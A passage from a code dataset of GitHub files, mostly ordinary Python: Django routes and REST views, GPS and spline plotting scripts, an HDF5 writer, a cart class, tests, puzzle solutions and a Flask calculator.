name='sql'),\n\turl(r'sql/getdb/$', views.sql_getdb, name='sqldb'),\n\turl(r'sql/getable/$', views.sql_getable, name='sqltable'),\n\turl(r'sql/getfiles/$', views.sql_getfiles, name='sqlfiles'),\n\turl(r'bug/$', views.bug_detail, name='bug'),\n\turl(r'bug/find/$', views.search_bug, name='bugsearch'),\n\turl(r'bug/getdetail/$', views.find_bug_detail, name='bugdetail'),\n\turl(r'pwd/$', views.pwd_crack, name='pwdcrack'),\n\turl(r'pwd/crack/$', views.pwd_get, name='pwdget'),\n\turl(r'pwd/md5/$', views.md5_crack, name='md5'),\n)","repo_name":"gitferry/webtest","sub_path":"peni/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3829164262","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 9 22:53:33 2018\n\n@author: owo\n\n做完 HW05_allforone.py\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt \n\nS_event = './{0}_data/{0}'.format('New_GPS_day2_out')\n\nAy_atmo_llh = np.load('{0}_atmsfree_llh_all.npy'.format(S_event))\nAy_atmo_xyz = np.load('{0}_atmsfree_xyz_all.npy'.format(S_event))\nAy_atmo_enu = np.load('{0}_atmsfree_enu_all.npy'.format(S_event))\nAy_atmo_sate_num = np.load('{0}_atmsfree_sate_num.npy'.format(S_event))\nAy_atmo_time = np.load('{0}_atmsfree_time.npy'.format(S_event))\nAy_atmo_DOP = np.load('{0}_atmsfree_DOP.npy'.format(S_event))\n\nplt.plot(Ay_atmo_time+24,Ay_atmo_sate_num)\nplt.xlabel('LT')\nplt.ylabel('num')\nplt.title('num of satelite')\nplt.savefig('{0}_notatmsfree_satenum.png'.format(S_event))\nplt.clf()\n\natmo_DOP = plt.plot(Ay_atmo_time,Ay_atmo_DOP[0,:],label='PDOP')\natmo_DOP = plt.plot(Ay_atmo_time,Ay_atmo_DOP[1,:],label='TDOP')\natmo_DOP = plt.plot(Ay_atmo_time,Ay_atmo_DOP[2,:],label='GDOP')\nplt.legend()\nplt.xlabel('LT')\nplt.ylabel('m')\nplt.title('atms-free_DOP')\n\nplt.savefig('{0}_DOP.png'.format(S_event))\nplt.clf()\n\nwith open('{0}_atmofree_llh_googleearth.txt'.format(S_event),'w') as f:\n for i in range(len(Ay_atmo_llh)):\n f.write(\"{0},{1},{2}\\n\".format(Ay_atmo_llh[i,1],Ay_atmo_llh[i,0],Ay_atmo_llh[i,2]))","repo_name":"mfkiwl/python-GPS-test","sub_path":"python_code/現代衛星導航作業/HW06/燒錄光碟用/程式與資料/end_data_readandplt.py","file_name":"end_data_readandplt.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8331855647","text":"import h5py\nimport numpy as np\n\n\ndirName = ''\n\nmeshName = 'fieldTest.h5'\n\nf = h5py.File(dirName + meshName, 'w')\n\n# meshGrp = f.create_group('Mesh')\n\n# nodes = meshGrp.create_dataset('Nodes', (9, 2), 'f8')\n# nodes[0, 0] = 0.0\n# nodes[0, 1] = 0.0\n# nodes[1, 0] = 1.0\n# nodes[1, 1] = 0.0\n# nodes[2, 0] = 1.0\n# nodes[2, 1]= 1.0\n# nodes[3, 0] = 0.0\n# nodes[3, 1]= 1.0\n# nodes[4, 0] = 0.5\n# nodes[4, 1]= 0.5\n# nodes[5, 0] = 0.5\n# nodes[5, 1]= 0.0\n# nodes[6, 0] = 1.0\n# nodes[6, 1]= 0.5\n# nodes[7, 0] = 0.5\n# nodes[7, 1]= 1.0\n# nodes[8, 0] = 0.0\n# nodes[8, 1]= 0.5\n\n# Tri\n# cells = meshGrp.create_dataset('Cells', (8, 3), dtype='i4')\n# cells[0, :] = [0, 5, 4]\n# cells[1, :] = [5, 1, 4]\n# cells[2, :] = [1, 6, 4]\n# cells[3, :] = [6, 2, 4]\n# cells[4, :] = [2, 7, 4]\n# cells[5, :] = [7, 3, 4]\n# cells[6, :] = [3, 8, 4]\n# cells[7, :] = [8, 0, 4]\n\n# Quad\n# cells = meshGrp.create_dataset('Cells', (4, 4), dtype='i4')\n# cells[0, :] = [0, 5, 4, 8]\n# cells[1, :] = [5, 1, 6, 4]\n# cells[2, :] = [4, 6, 2, 7]\n# cells[3, :] = [8, 4, 7, 3]\n\n# Tri 2\n# cells = meshGrp.create_dataset('Cells', (2, 6), dtype='i4')\n# cells[0, :] = [0, 1, 3, 5, 4, 8]\n# cells[1, :] = [3, 1, 2, 4, 6, 7]\n\n# Quad 2\n# cells = meshGrp.create_dataset('Cells', (1, 9), 'i4')\n# cells[0, :] = [0, 1, 2, 3, 5, 6, 7, 8, 4]\n\nfieldGrp = f.create_group('FieldData')\n\nnodeField = fieldGrp.create_dataset('NodeField', (9,1,1), 'f8')\nfor i in range(9):\n nodeField[i, 0, 0] = i\nnodeField.attrs['ftype'] = 0\n\ncellField = fieldGrp.create_dataset('CellField', (8,2,1), 'f8')\nfor i in range(8):\n cellField[i, 0, 0] = i\n cellField[i, 1, 0] = -i\ncellField.attrs['ftype'] = 3\n\nf.close()\n","repo_name":"julienfausty/HyperFox","sub_path":"ressources/meshes/writeh5.py","file_name":"writeh5.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"22294736519","text":"from db import getItemPrice\nclass Cart:\n def __init__(self) -> None:\n self.shoppingCart = {}\n\n def addItem(self, item):\n if item not in self.shoppingCart:\n self.shoppingCart[item]=0\n self.shoppingCart[item]+=1\n\n def removeItem(self, item):\n if item in self.shoppingCart:\n if self.shoppingCart[item] <= 0:\n return(\"Error: Item count is 0.\")\n self.shoppingCart[item]-=1\n return(f\"Removed 1 {item}\")\n\n else:\n return(\"Error: Item count is 0.\")\n\n#takes in cart from retrieve cart, then adds html to make the cart look nice\n def decorateCart(cart):\n return_html = \"\"\n finalTotalPrice = 0\n for keys, value in cart.items():\n if value > 0:\n itemPrice = getItemPrice(keys)\n totalPrice = round(itemPrice * value, 2)\n return_html += f\"{keys}: {value} = ${totalPrice}\\n\"\n finalTotalPrice += totalPrice\n \n return_html += \"$\" + str(round(finalTotalPrice, 2))\n return(return_html.split('\\n'))\n \n def getTotal(cart):\n finalTotalPrice = 0\n for keys, value in cart.items():\n if value > 0:\n itemPrice = getItemPrice(keys)\n totalPrice = round(itemPrice * value, 2)\n finalTotalPrice += totalPrice\n \n return(finalTotalPrice)\n\n","repo_name":"icyandrew360/GroceryStore","sub_path":"cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"10903006159","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\ndef joke():\n T=int(input(\"\"))\n for i in range(0,T):\n N=int(input(\"\"))\n l1=[\"\"]*N\n for j in range(0,N):\n s=input(\"\")\n l1=list(list(map(int,str(s).split())))\n X=l1[0][0]\n Y=l1[0][1]\n\n","repo_name":"anshumanairy/Codechef","sub_path":"Good Joke.py","file_name":"Good Joke.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"2628273039","text":"DEFAULT_URL = \"https://panorama.pub\"\n\n\ndef process(url=DEFAULT_URL, web_page_path=\"\", data_path=\"\"):\n url = url\n path = data_path\n\n d = downloader(url=url, mode=\"get\")\n d.save(web_page_path + \"panorama.html\")\n\n p = parser()\n if url == DEFAULT_URL:\n r = p.parse_main_page(web_page_path + \"panorama.html\")\n path += \"main_page.json\"\n elif url[url.rfind('/') + 1:].replace('-', '').isdigit():\n r = p.parse_day(web_page_path + \"panorama.html\")\n path += \"day.json\"\n else:\n r = p.parse_article(web_page_path + \"panorama.html\")\n path += \"article.json\"\n\n p.save(path)\n return update(r)\n\n\nif __name__ == \"__main__\":\n from downloader import downloader\n from parser import parser\n from data import update\nelse:\n from .downloader import downloader\n from .parser import parser\n from .data import update\n","repo_name":"incllude/PanoramaPubScraper","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3194464062","text":"'''\nhttps://leetcode.com/problems/longest-common-prefix/\n\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\n\n\nExample 1:\n\nInput: strs = [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\n\nInput: strs = [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\n\n'''\n\ndef longest_common_prefix(str):\n if not str:\n return \"\"\n short_word = min(str, key=len)\n\n for i, ch in enumerate(short_word):\n for otherwords in str:\n if otherwords[i] != ch:\n return short_word[:i]\n return short_word\n\n\nstrr = [\"flower\",\"flow\",\"flight\"]\nprint(longest_common_prefix(strr))","repo_name":"kumarravindra/leetworld","sub_path":"ltc_python_topics/com/lc/easy/Longest_Common_Prefix.py","file_name":"Longest_Common_Prefix.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16454375209","text":"from random import randint, choices, sample\r\nimport re\r\n\r\nRE_SEPARATORS = re.compile(\"[,;]\")\r\nRE_ELEMENTS = re.compile(\"(?<=(l|u).)[^$\\#]+\")\r\n\r\ndef trouver_elements_et_n_fois(cmd:str) -> tuple[list[str], int]:\r\n elements = re.search(RE_ELEMENTS, cmd)\r\n assert elements != None, \"Syntaxe invalide, aucun élément n'est présent\"\r\n\r\n nombre_fois = cmd[:elements.start()-2]\r\n assert nombre_fois.isdigit(), \"Commande invalide, le nombre d'élément choisis est invalide\"\r\n nombre_fois = int(nombre_fois)\r\n\r\n if \"#\" in cmd:\r\n commentaire = cmd[cmd.index(\"#\"):]\r\n else:\r\n commentaire = \"\"\r\n\r\n elements = re.split(RE_SEPARATORS, elements.group())\r\n\r\n assert nombre_fois >= 1, \"Syntaxe invalide, le nombre d'éléments choisis est inférieur à 1\"\r\n\r\n return elements, nombre_fois, commentaire\r\n\r\ndef formater_resultat(commentaire, elements):\r\n if type(elements) == str and not elements.startswith(\" \"):\r\n elements = \" \"+startswith\r\n return \"Résultat du tirage : \\n{0}\\n{1}\".format(commentaire, str(elements)[1:-1])\r\n\r\ndef exec_l(cmd:str):\r\n elements, nombre_fois, commentaire = trouver_elements_et_n_fois(cmd) \r\n return formater_resultat(commentaire, choices(elements, k=nombre_fois))\r\n\r\ndef exec_u(cmd:str):\r\n elements, nombre_fois, commentaire = trouver_elements_et_n_fois(cmd)\r\n assert nombre_fois <= len(elements), \"commande invalide, le nombre d'éléments choisis est supérieur au nombre de choix possible\"\r\n \r\n choix = sample(elements, nombre_fois)\r\n\r\n return formater_resultat(commentaire, choix)\r\n","repo_name":"Otomatyk/PyDiceBot","sub_path":"dice_engine_l_et_u.py","file_name":"dice_engine_l_et_u.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"5840431630","text":"from rest_framework.permissions import BasePermission\n\nfrom posts.models import Post\n\n\nclass IsOwner(BasePermission):\n def has_permission(self, request, view):\n try:\n user_profile = Post.objects.get(\n pk=view.kwargs['pk'])\n except (Post.DoesNotExist, Post.MultipleObjectsReturned):\n return False\n\n if request.user.profile == user_profile:\n return True\n return False\n","repo_name":"AnufriyevT/RestApiBlog","sub_path":"posts/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"853997368","text":"import cubic_spline\nimport plotting\nimport error\nimport data_generator\nimport Bspline\nfrom tabulate import tabulate\nimport matplotlib.pyplot as plt\nimport warnings\nimport os\nwarnings.filterwarnings(\"ignore\", message=\"elementwise comparison failed; returning scalar instead, but in the future will perform elementwise comparison\")\n\nprint(\"===================================================\")\nprint(\"COSC 6364 FINAL PROJECT: SPLINE INTERPOLATION IN 3D\")\nprint(\"===================================================\")\nnumcoords = input(\"Number of Coordinates: \")\nxspace = input(\"x coordinate spacing: \")\nprint(\"Range of Y-values:\")\ny_low = input(\"Low: \")\ny_high = input(\"High: \")\nprint(\"\\n\")\n\ncoordinates = data_generator.generate_coordinates(int(numcoords), int(xspace), int(y_low), int(y_high))\n\n#coordinates = data_generator.generate_coordinates(10, 2, 1, 100)\n#print(\"Coordinates Generated: \")\n\n#print(coordinates)\n\nx = coordinates[0]\ny = coordinates[1]\nz = coordinates[2]\n\n''''\n---------------------------------------------------\nCUBIC SPLINE CALCULATIONS\n---------------------------------------------------\n'''\n\n\nxy_coefs = cubic_spline.cubic_interpolation(x,y)\nxz_coefs = cubic_spline.cubic_interpolation(x,z)\n\ndir_path = 'plots/cubic'\nif not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\nfig1 = plotting.plot_spline2D(x, y, xy_coefs)\nfig1.savefig('plots/cubic/spline2D.png')\nplt.close(fig1)\n\nfig2 = plotting.plot_spline3D(x,y,z, xy_coefs, xz_coefs)\nfig2.savefig('plots/cubic/spline3D.png')\nplt.close(fig2)\n\n\n\n'''\n---------------------------------------------------\nB-SPLINE CALCULATIONS\n---------------------------------------------------\n'''\n\nBspline_2D_results = []\nBspline_3D_results = []\n\nBspline_2D_Alt = []\nBspline_3D_Alt = []\n\ndir_path = 'plots/bspline'\nif not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\nfor degree in range(1,5):\n Bspline_2D_results.append(Bspline.Bspline_interpolate((coordinates[0],coordinates[1]), degree, 100)) #2D Calculation\n Bspline_3D_results.append(Bspline.Bspline_interpolate(coordinates, degree, 100)) #3D Calculation\n\nfor i in range(0,4):\n \n out_2D = Bspline_2D_results[i][0]\n tck_2D = Bspline_2D_results[i][1]\n Bspline_2D_Plot = (plotting.plot_2D_Bspline_WithControlPolygon(x ,y, tck_2D, out_2D))\n Bspline_2D_Plot.savefig(f'plots/bspline/Bspline_2D_Plot_Degree_{i+1}.png')\n plt.close(Bspline_2D_Plot)\n\n out_3D = Bspline_3D_results[i][0]\n tck_3D = Bspline_3D_results[i][1]\n Bspline_3D_Plots = (plotting.plot_3D_BSpline_WithControlPolygon(x ,y, z, tck_3D, out_3D))\n Bspline_3D_Plots.savefig(f'plots/bspline/Bspline_3D_Plot_Degree_{i+1}.png')\n plt.close(Bspline_3D_Plots)\n \n #Alternate Method\n Bspline_2D_Plot_Alt = plotting.plot_2D_Bspline_alternate((x,y),i+1)\n Bspline_2D_Plot_Alt.savefig(f'plots/bspline/BsplineAlt_2D_Plot_Degree_{i+1}.png')\n plt.close(Bspline_2D_Plot_Alt)\n\n Bspline_3D_Plot_Alt = plotting.plot_3D_Bspline_alternate((x,y,z),i+1)\n Bspline_3D_Plot_Alt.savefig(f'plots/bspline/BsplineAlt_3D_Plot_Degree_{i+1}.png')\n plt.close(Bspline_3D_Plot_Alt)\n\n\n''''\n---------------------------------------------------\nERROR CALCULATION AND REPORTING\n---------------------------------------------------\n'''\n\n# CUBIC SPLINE ERROR\ncub_abs_error_y, cub_rel_error_y = error.error(x, y, xy_coefs)\ncub_abs_error_z, cub_rel_error_z = error.error(x, z, xz_coefs)\ncub_abs_mag_error = error.mag_error(cub_abs_error_y, cub_abs_error_z)\ncub_rel_mag_error = error.mag_error(cub_rel_error_y, cub_rel_error_z)\n\n# B-SPLINE ERROR\n#bspline_error_2D_cubic = error.bspline_error(x,y,3)\n\nbspline_error_1D_quadratic = error.bspline_error2(x,y,2)\nbspline_error_1D_cubic = error.bspline_error2(x,y,3)\nbspline_error_1D_quartic = error.bspline_error2(x,y,4)\n\nbspline_error_1D_quadratic_z = error.bspline_error2(x,z,2)\nbspline_error_1D_cubic_z = error.bspline_error2(x,z,3)\nbspline_error_1D_quartic_z = error.bspline_error2(x,z,4)\n\nbs_err_2D_quad_abs = error.mag_error(bspline_error_1D_quadratic[0], bspline_error_1D_quadratic_z[0])\nbs_err_2D_cubic_abs = error.mag_error(bspline_error_1D_cubic[0], bspline_error_1D_cubic_z[0])\nbs_err_2D_quartic_abs = error.mag_error(bspline_error_1D_quadratic[0], bspline_error_1D_quartic_z[0])\n\n#print(bspline_error_2D_cubic[0])\n#print(bspline_error_2D_cubic[1])\nprint(\"Cubic spline plots saved to ..\\\\plots\\\\cubic\")\nprint(\"B-Spline plots saved to ..\\\\plots\\\\bspline\")\nprint(\"\\n\")\n\ntable = [ [\"Method\", \"AVG Abs Error\", \"AVG Rel Error %\"],\n [\"Cubic Spline 1D\", sum(cub_abs_error_y)/len(x), (sum(cub_rel_error_y)/len(x))*100],\n [\"Cubic Spline 2D\", sum(cub_abs_mag_error)/len(x), (sum(cub_rel_mag_error)/len(x))*100],\n [\"B-Spline 1D - Degree 2\", sum(bspline_error_1D_quadratic[0])/len(x), (sum(bspline_error_1D_quadratic[1])/len(x))*100],\n [\"B-Spline 1D - Degree 3\", sum(bspline_error_1D_cubic[0])/len(x), (sum(bspline_error_1D_cubic[1])/len(x))*100],\n [\"B-Spline 1D - Degree 4\", sum(bspline_error_1D_quartic[0])/len(x), (sum(bspline_error_1D_quartic[1])/len(x))*100],\n [\"B-Spline 2D - Degree 2\", sum(bs_err_2D_quad_abs)/len(x), (sum(bs_err_2D_quad_abs)/len(x))*100],\n [\"B-Spline 2D - Degree 3\", sum(bs_err_2D_cubic_abs)/len(x), (sum(bs_err_2D_cubic_abs)/len(x))*100],\n [\"B-Spline 2D - Degree 4\", sum(bs_err_2D_quartic_abs)/len(x), (sum(bs_err_2D_quartic_abs)/len(x))*100]\n]\n\nprint(tabulate(table, headers=\"firstrow\"))\nprint(\"\\n\")\n\n\ndir_path = 'plots/err'\nif not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\nabsFig_y = plotting.semi_log(x, cub_abs_error_y, \"Absolute Error in Y Plane\", \"x\", \"Error\")\nabsFig_y.savefig('plots/err/absErrorY.png')\nplt.close(absFig_y)\n\nrelFig_y = plotting.semi_log(x, cub_rel_error_y, \"Relative Error in Y Plane\", \"x\", \"Error\")\nrelFig_y.savefig('plots/err/relErrorY.png')\nplt.close(relFig_y)\n\nabsFig_z = plotting.semi_log(x, cub_abs_error_z, \"Absolute Error in Z Plane\", \"x\", \"Error\")\nabsFig_z.savefig('plots/err/absErrorZ.png')\nplt.close(absFig_y)\n\nrelFig_z = plotting.semi_log(x, cub_rel_error_z, \"Relative Error in Z Plane\", \"x\", \"Error\")\nrelFig_z.savefig('plots/err/relErrorZ.png')\nplt.close(relFig_z)\n\n\n\n\n","repo_name":"sm7777/spline_interpolation","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25975874999","text":"from rest_framework import generics\nfrom .models import HabitsModel, Title, UserHabitsModel, Tasks\nfrom .serializers import HabitsSerializer, TitleSerializer, UserHabitsSerializer, TasksSerializer\n\n\nclass TitleDetail(generics.RetrieveUpdateAPIView):\n lookup_field = 'pk'\n queryset = Title.objects.all()\n serializer_class = TitleSerializer\n\ntitle_detail_view = TitleDetail.as_view()\n\nclass HabitsListCreateView(generics.ListCreateAPIView):\n queryset = HabitsModel.objects.all()\n serializer_class = HabitsSerializer\n\nhabits_list_create_view = HabitsListCreateView.as_view()\n\nclass HabitsDetailUpdateDeleteView(generics.RetrieveUpdateDestroyAPIView):\n lookup_field = 'pk'\n queryset = HabitsModel.objects.all()\n serializer_class = HabitsSerializer\n\nhabits_detail_ud = HabitsDetailUpdateDeleteView.as_view()\n\n\nclass UserHabitsListCreateView(generics.ListCreateAPIView):\n queryset = UserHabitsModel.objects.all()\n serializer_class = UserHabitsSerializer\n\nuser_habits_list_create_view = UserHabitsListCreateView.as_view()\n\nclass UserHabitsDetailUpdateDeleteView(generics.RetrieveUpdateDestroyAPIView):\n lookup_field = 'pk'\n queryset = UserHabitsModel.objects.all()\n serializer_class = UserHabitsSerializer\n\nuser_habits_detail_ud = UserHabitsDetailUpdateDeleteView.as_view()\n\nclass TaskListView(generics.ListAPIView):\n queryset = Tasks.objects.all().order_by('-pk')\n serializer_class = TasksSerializer\n\ntask_list_view = TaskListView.as_view()\n\nclass TaskDetailUpgrade(generics.RetrieveUpdateAPIView):\n lookup_field = 'pk'\n queryset = Tasks.objects.all()\n serializer_class = TasksSerializer\n\n\ntask_detail_upgrade = TaskDetailUpgrade.as_view()","repo_name":"RobTov/anavrin-backend","sub_path":"habits/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26778969119","text":"import pytest\nfrom django.contrib.auth.models import User\nfrom django.test import override_settings\nfrom django.urls import reverse\n\nfrom analytics.models import Event\nfrom analytics.views import encode_keyset, JsonbFieldIncrementer\n\nTEST_PASSWORD = \"password\"\n\n\n# tag::fixtures[]\n@pytest.fixture\ndef user():\n return User.objects.create_user(\n username=\"Mac\", password=TEST_PASSWORD)\n\n\n@pytest.fixture\ndef events(user):\n Event.objects.create(\n name=\"goal.viewed\", user=user, data={\"test\": 1})\n Event.objects.create(\n name=\"goal.clicked\", user=user, data={\"test\": 2})\n Event.objects.create(\n name=\"goal.favorited\", user=user, data={\"test\": 3})\n return Event.objects.all().order_by('pk')\n\n\n# end::fixtures[]\n\n@pytest.fixture\ndef authenticated_client(user, client):\n client.login(username=user.username, password=TEST_PASSWORD)\n return client\n\n\n@pytest.fixture\n@override_settings(DEBUG=True, EVENTS_PER_PAGE=2)\ndef page_one_generic(authenticated_client):\n url = reverse(\"events_keyset_generic\")\n return authenticated_client.get(url)\n\n\n@pytest.fixture\n@override_settings(DEBUG=True, EVENTS_PER_PAGE=2)\ndef page_one_pg(authenticated_client):\n url = reverse(\"events_keyset_pg\")\n return authenticated_client.get(url)\n\n\ndef content(page):\n return page.content.decode(\"utf-8\")\n\n\n@pytest.mark.django_db\ndef test_includes_page_one_results(events, page_one_generic):\n assert events[0].name in content(page_one_generic)\n assert events[1].name in content(page_one_generic)\n\n\n@pytest.mark.django_db\ndef test_hides_second_page_results(events, page_one_generic):\n assert events[2].name not in content(page_one_generic)\n\n\n@pytest.mark.django_db\ndef test_has_next_link(events, page_one_generic):\n last_page_one_event = events[1]\n expected_keyset = encode_keyset(last_page_one_event)\n assert expected_keyset in content(page_one_generic)\n\n\n@pytest.mark.django_db\ndef test_next_link_requests_next_page(events,page_one_generic,\n authenticated_client):\n next_keyset = page_one_generic.context['next_keyset']\n next_page_url = \"{}?keyset={}\".format(\n reverse(\"events_keyset_generic\"), next_keyset)\n page_two_event = events[2]\n page_two = authenticated_client.get(next_page_url)\n assert page_two_event.name in content(page_two)\n\n\n@pytest.mark.django_db\ndef test_includes_page_one_results_pg(events, page_one_pg):\n assert events[0].name in content(page_one_pg)\n assert events[1].name in content(page_one_pg)\n\n\n@pytest.mark.django_db\ndef test_hides_second_page_results_pg(events, page_one_pg):\n assert events[2].name not in content(page_one_pg)\n\n\n@pytest.mark.django_db\ndef test_has_next_link_pg(events, page_one_pg):\n last_page_one_event = events[1]\n expected_keyset = encode_keyset(last_page_one_event)\n assert expected_keyset in content(page_one_pg)\n\n\n@pytest.mark.django_db\ndef test_next_link_requests_next_page_pg(events, page_one_pg,\n authenticated_client):\n next_keyset = page_one_pg.context['next_keyset']\n next_page_url = \"{}?keyset={}\".format(\n reverse(\"events_keyset_pg\"), next_keyset)\n page_two_event = events[2]\n page_two = authenticated_client.get(next_page_url)\n assert page_two_event.name in content(page_two)\n\n\n# tag::testing_jsonb_incrementer[]\n@pytest.mark.django_db\ndef test_json_incrementer_sets_missing_count(events):\n assert all(['count' not in e.data for e in events])\n incr_by_one = JsonbFieldIncrementer('data', 'count', 1)\n events.update(data=incr_by_one)\n for event in events:\n assert event.data['count'] == 1\n\n\n@pytest.mark.django_db\ndef test_json_incrementer_increments_count(events):\n events.update(data={\"count\": 1})\n incr_by_one = JsonbFieldIncrementer('data', 'count', 1)\n events.update(data=incr_by_one)\n for event in events:\n assert event.data['count'] == 2\n# end::testing_jsonb_incrementer[]\n","repo_name":"abrookins/quest","sub_path":"analytics/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"2"} +{"seq_id":"24242377310","text":"import re\ndef calc_a(input):\n ancestors = set()\n\n rows = input.split('\\n')\n # collect all ancestors\n for row in rows:\n if '->' in row:\n children = row.split('->')[1].split()\n for child in children:\n ancestors.add(child.replace(',', ''))\n\n # get node that's not an ancestor\n for row in rows:\n node = row.split()[0]\n if node not in ancestors:\n return node\n\n return \"not found \"\n\ndef calc_b(input):\n nodes = {}\n weight_patter = re.compile(\".*\\((\\d+)\\).*\")\n\n rows = input.split('\\n')\n # create all nodes\n for row in rows:\n name = row.split()[0]\n m = weight_patter.match(row)\n weight = int(m.group(1), 10)\n node = Node(weight, name)\n nodes[name] = node\n\n # build graph (connect all children)\n for row in rows:\n if '->' in row:\n name = row.split()[0]\n node = nodes[name]\n children = row.split('->')[1].split()\n for child in children:\n child_name = child.replace(',', '')\n child_node = nodes[child_name]\n node.add_child(child_node)\n\n parent_name = calc_a(input)\n\n parent_node = nodes[parent_name]\n\n return parent_node.find_imbalance()\n\n\n\nclass Node:\n\n def __init__(self, weight, name):\n self.weight = weight\n self.name = name\n self.children = []\n\n def add_child(self, node):\n self.children.append(node)\n\n def get_weight(self):\n child_weights = 0\n\n for child in self.children:\n child_weights += child.get_weight()\n return self.weight + child_weights\n\n def has_imbalanced_children(self):\n if len(self.children) == 0:\n return False\n weight = self.children[0].get_weight()\n for child in self.children:\n if child.get_weight() != weight:\n return True\n return False\n\n def find_imbalance(self):\n # seems like there's always an overweight rather than underweight\n max = 0\n min = 999999999\n for child in self.children:\n # print(child.name, child.get_weight(), child.weight)\n if child.get_weight() < min:\n min = child.get_weight()\n if child.get_weight() > max:\n max = child.get_weight()\n unbalanced_node = child\n\n if unbalanced_node.has_imbalanced_children():\n return unbalanced_node.find_imbalance()\n\n return unbalanced_node.weight - (max - min)","repo_name":"alphapeter/AoC2017","sub_path":"day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36410331377","text":"from flask import Flask, render_template, request, redirect, flash, get_flashed_messages\n\napp = Flask(__name__)\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n\tif request.method == \"POST\":\n\t\top = request.form['op']\n\t\tfnum = request.form['fnum']\n\t\tsnum = request.form['snum']\n\t\ttry:\n\t\t\tif '.' in fnum:\n\t\t\t\tfnum = float(fnum)\n\t\t\telse:\n\t\t\t\tfnum = int(fnum)\n\t\t\tif '.' in snum:\n\t\t\t\tsnum = float(snum)\n\t\t\telse:\n\t\t\t\tsnum = int(snum)\n\t\texcept ValueError:\n\t\t\treturn redirect(\"/result/error\")\n\t\tresult = 0\n\t\tif op == \"add\":\n\t\t\tresult = fnum + snum\n\t\telif op == \"sub\":\n\t\t\tresult = fnum - snum\n\t\telif op == \"mult\":\n\t\t\tresult = fnum * snum\n\t\telif op == \"divide\":\n\t\t\tresult = fnum / snum\n\t\tflash(result)\n\t\treturn redirect(\"/result/\" + op)\n\treturn render_template(\"home.html\")\n\n@app.route('/result/')\ndef op(op):\n\tif op == \"error\":\n\t\treturn render_template(\"error.html\", error=\"Must be ints or floats.\")\n\tmsgs = get_flashed_messages()\n\tif len(msgs) == 0:\n\t\treturn render_template(\"error.html\", error=\"Error occured. Try again.\")\n\treturn render_template(\"result.html\", result=msgs[0])\n\n@app.errorhandler(404)\ndef err_404(e):\n\treturn render_template(\"err.html\", errorcode=404)\n\n@app.errorhandler(403)\ndef err_403(e):\n\treturn render_template(\"err.html\", errorcode=403)\n\n@app.errorhandler(500)\ndef err_500(e):\n\treturn render_template(\"err.html\", errorcode=500)\n\nif __name__ == \"__main__\":\n\tapp.run()\n","repo_name":"mohsinmalik324/school-sbu","sub_path":"cse337/hw4/Mohsin_Malik_110880864/q2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2091903178","text":"import subprocess\nimport os\nimport numpy\n\neccentricity_filenames = ['eccen0', 'eccen01a', 'eccen02a', 'eccen03a', 'eccen04a', 'eccen05a', 'eccen06a']\n\nbinary_ratio_filenames = ['br_0010', 'br_0050', 'br_0100']\n\nfor edir in eccentricity_filenames:\n for bdir in binary_ratio_filenames:\n cdir = os.path.join(edir, bdir, 'gas_only_hr/')\n output=subprocess.check_output('cp phantomanalysis ' + cdir, stderr=subprocess.STDOUT,\n universal_newlines=True, shell=True)\n print(output)\n os.chdir(cdir)\n print('cd ' + cdir)\n output = subprocess.check_output('ls', stderr=subprocess.STDOUT,\n universal_newlines=True, shell=True)\n\n print(output)\n output = subprocess.check_output('./phantomanalysis gas_only_hr_0*', stderr=subprocess.STDOUT,\n universal_newlines=True, shell=True)\n print(output)\n sink1 = numpy.genfromtxt('sinkpositions_1.dat', dtype=None)\n sink2 = numpy.genfromtxt('sinkpositions_2.dat')\n # print(sink1)\n dumpfile = []\n 